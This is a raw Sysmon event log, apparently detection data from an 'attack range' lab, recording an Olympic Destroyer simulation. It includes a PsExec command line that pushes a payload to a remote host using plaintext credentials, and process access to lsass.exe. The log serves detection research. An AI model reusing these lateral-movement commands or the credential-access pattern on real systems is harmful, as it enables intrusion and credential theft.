Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F0CF5019A2EF141FB9BC0C03CAC713BA,SHA256=49EC5AEB7219F63777CD33C1A04BD9A81EBE562AF05FF9862595FAD3914F8F9A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000294549Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:52.896{C8EA50B7-F2AA-6215-B100-000000003802}22444896C:\Windows\system32\csrss.exe{C8EA50B7-145C-6216-9606-000000003802}6760C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000294548Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:52.880{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294547Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:52.880{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294546Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:52.880{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294545Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:52.880{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294544Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:52.880{C8EA50B7-12E6-6216-4B05-000000003802}67926956C:\Temp\olympic_destroyer.exe{C8EA50B7-145C-6216-9606-000000003802}6760C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9278(wow64)|C:\Windows\System32\KERNELBASE.dll+15a0bb(wow64)|C:\Windows\System32\KERNELBASE.dll+159d6c(wow64)|C:\Temp\olympic_destroyer.exe+469a|C:\Temp\olympic_destroyer.exe+47ec|C:\Temp\olympic_destroyer.exe+4985|C:\Temp\olympic_destroyer.exe+5ac1|C:\Temp\olympic_destroyer.exe+84b3|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 154100x8000000000000000294543Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:52.883{C8EA50B7-145C-6216-9606-000000003802}6760C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe2.2Execute processes remotelySysinternals PsExecSysinternals - www.sysinternals.compsexec.cC:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe \\ip-10-0-1-15.eu-central-1.compute.internal -u "WW930\a593309" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\ADMINI~1\AppData\Local\Temp\_pwv.exe"C:\Temp\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=27304B246C7D5B4E149124D5F93C5B01,SHA256=3337E3875B05E0BFBA69AB926532E3F179E8CFBF162EBB60CE58A0281437A7EF,IMPHASH=C1E59519B5E5D84AF07AFA6F5A8625F1{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe"C:\Temp\olympic_destroyer.exe" 10341000x8000000000000000294542Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:52.880{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-145C-6216-9606-000000003802}6760C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000294561Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:53.948{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=899F5981A540CF8D18BBD9A3A577A6FA,SHA256=C1347AFB02EA1C335515B3B9E5BF2E18CCE6D5338D519C7ABAD54A7BFE5E46A0,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000218844Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:50.686{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51483-false10.0.1.12-8000- 23542300x8000000000000000218843Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:53.223{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=174FDC6BEDFF6BA259469C2D50D8744A,SHA256=FA682385E39860E3A19F3AE5D24EDF59CD9D5A762E51786A04BE1BE4C283F34C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294560Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:53.895{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=3BDD06081315B337B2C5E6A1676C10E3,SHA256=CC53D8A4660B87579A7F8923C7461506B732F6C2B5906E8BA195238D05BB6C5F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294559Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:53.895{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=AA2C8965BF45270A6D3F50DF6824DE8A,SHA256=AE8EAE0EE3E4C538A57528B362F5C3DDEC7337EDD98D94F404D4DEE901231BAB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000294558Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:53.180{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-145C-6216-9606-000000003802}6760C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+26327|C:\Windows\system32\lsasrv.dll+2746d|C:\Windows\system32\lsasrv.dll+261a5|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294557Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:53.180{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-145C-6216-9606-000000003802}6760C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\system32\lsasrv.dll+260ed|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000294556Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localAlert,Sysinternals Tool UsedSetValue2022-02-23 11:02:53.180{C8EA50B7-145C-6216-9606-000000003802}6760C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exeHKU\S-1-5-21-1032146228-2128790581-2941542908-500\SOFTWARE\Sysinternals\PsExec\EulaAcceptedDWORD (0x00000001) 10341000x8000000000000000294555Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:53.118{C8EA50B7-F11F-6215-1000-000000003802}364764C:\Windows\system32\svchost.exe{C8EA50B7-145D-6216-9706-000000003802}1016C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294554Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:53.118{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-145D-6216-9706-000000003802}1016C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294553Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:53.118{C8EA50B7-145D-6216-9706-000000003802}10166808C:\Windows\system32\conhost.exe{C8EA50B7-145C-6216-9606-000000003802}6760C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294552Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:53.049{C8EA50B7-F2AA-6215-B100-000000003802}22443360C:\Windows\system32\csrss.exe{C8EA50B7-145D-6216-9706-000000003802}1016C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000294551Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:53.033{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-145D-6216-9706-000000003802}1016C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000294563Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:54.963{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A04C187C6BB2A59BFECD57AC01EE6766,SHA256=34DAE71241063346508082F4104B0EC38FAFC27488EA6876FAF794DD42F3596D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218845Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:54.285{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F8CCC313A05B99872F8BD19A60A8FE32,SHA256=502CD1217BEBF69DE557CEBB12C5F3CC17C439C4243B746318D83ED95B5AB67F,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000294562Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:52.671{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local52590- 23542300x8000000000000000294564Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:55.979{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=32EE07A2C1BD26575B35F979487A9F12,SHA256=72558B89CDE11CD8F00F34477A4495BA30975FB747109240DA79215171F3EC13,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218846Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:55.301{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5E2DD71F8BF135404506589B740C9464,SHA256=EF59AD0CD62C7C316E17567626A1D5DBB09B5EF99536BCDD3D91AF6D543C9C12,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294567Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:56.994{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=13F23719F3E5BF0F882D705274F1D5DC,SHA256=3127E9C67A283395F825A7FDE17811EDBF4ECD21E6D0CBA88BEE5103B49B758B,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000218848Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:54.641{4F8D34B0-F11C-6215-1000-000000003902}940C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse187.141.52.101customer-187-141-52-101-sta.uninet-ide.com.mx53708-false10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal3389ms-wbt-server 23542300x8000000000000000218847Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:56.363{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=263AAB71EAECF19C8A8CB90DFE0467E8,SHA256=1FF32F9CCA60BA435990929234293ECE22C9B930B9E6A461A1E05E6D0C34B18E,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000294566Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:53.822{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local59963- 354300x8000000000000000294565Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:53.571{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49152-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000218851Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:57.629{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F3815126B632B0C5993E3397C8486DC6,SHA256=63343D8A6D1FBE7F2564C88C2EA9437217D6880FC776EC074FBAF4092767BB60,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218850Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:57.629{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F513021B8252EC04A1BBC557843026F7,SHA256=9BDDE08CC3B50F8D1711A27CFF255FE8E48017B319EAD51F235B9B555BDBFCA5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218849Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:57.441{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4920B39DB2126633E75488E458383DC5,SHA256=1B7F9A13585B4A0B04192339CEDB8E35E14A744DE8A206A7386BA3DA901CB453,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000218853Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:56.623{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51484-false10.0.1.12-8000- 23542300x8000000000000000218852Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:58.457{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5F8C5EFA168073B16ACD8ADFB925CAF8,SHA256=5596F18DC77E95CF0D13B0A59D68889D36418B107558A4668F6E21F243351F32,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294568Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:58.014{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=41750EB176BD53A198D84D097408FB35,SHA256=E39BA3A136B7DDDD5916883982D6942F37D8AA95D13D376E46CC9BA00DB7E90A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218854Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:59.472{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=208304E01EE2FBD877D4C6CDBDCB1466,SHA256=E3D6CC480AF500BC707DA7215457665DE0AE1DFB771C0087664B08A9699E868F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294569Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:59.031{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=009D87071028ADFAEC8D232E46FE56F0,SHA256=78045CD429155FBBFEE629820007EBA9C00FD140A6C3EFB2B317C926C9434928,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218857Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:00.988{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F3815126B632B0C5993E3397C8486DC6,SHA256=63343D8A6D1FBE7F2564C88C2EA9437217D6880FC776EC074FBAF4092767BB60,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000218856Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:58.048{4F8D34B0-F11C-6215-1000-000000003902}940C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse187.141.52.101customer-187-141-52-101-sta.uninet-ide.com.mx56819-false10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal3389ms-wbt-server 23542300x8000000000000000218855Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:00.488{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 